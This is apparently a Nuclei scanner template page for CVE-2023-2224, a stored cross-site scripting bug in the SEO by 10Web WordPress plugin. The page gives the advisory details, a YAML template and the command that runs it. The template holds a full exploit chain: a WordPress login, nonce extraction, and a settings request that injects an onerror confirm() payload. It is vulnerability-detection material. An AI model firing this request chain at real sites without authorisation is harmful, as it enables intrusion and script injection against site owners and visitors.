Seo By 10Web < 1.2.7 - Cross-Site Scripting
ID: CVE-2023-2224
Severity: medium
Author: luisfelipe146
Tags: cve2023,cve,wpscan,packetstorm,wp,wordpress,wp-plugin,xss,seo,10web,authenticated
Description
Section titled “Description”The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
YAML Source
Section titled “YAML Source”id: CVE-2023-2224
info: name: Seo By 10Web < 1.2.7 - Cross-Site Scripting author: luisfelipe146 severity: medium description: | The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). reference: - https://wpscan.com/vulnerability/a76b6d22-1e00-428a-8a04-12162bd0d992 - https://packetstormsecurity.com/files/173725/WordPress-Seo-By-10Web-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2023-2224 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2023-2224 cwe-id: CWE-79 epss-score: 0.00101 epss-percentile: 0.41469 cpe: cpe:2.3:a:10web:seo:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 3 vendor: 10web product: seo framework: wordpress tags: cve2023,cve,wpscan,packetstorm,wp,wordpress,wp-plugin,xss,seo,10web,authenticated
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=wdseo_sitemap HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=2 HTTP/1.1 Host: {{Hostname}}
task=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28document.domain%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1
matchers-condition: and matchers: - type: word part: body_3 words: - 'value=""><audio src=x onerror=confirm(document.domain)>"'
- type: word part: header_3 words: - text/html
- type: status part: header_3 status: - 200
extractors: - type: regex name: nonce part: body group: 1 regex: - 'name="nonce_wdseo" value="([a-z0-9]+)" \/>' internal: true# digest: 490a0046304402207317645f7ff53ce5efe50a8acc58be569f84687cfd4d72437472a6178fed16030220357573158b1b6196c8c486f78ba4258eee0e28a98ea82776ba68d93a96999a9b:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-2224.yaml"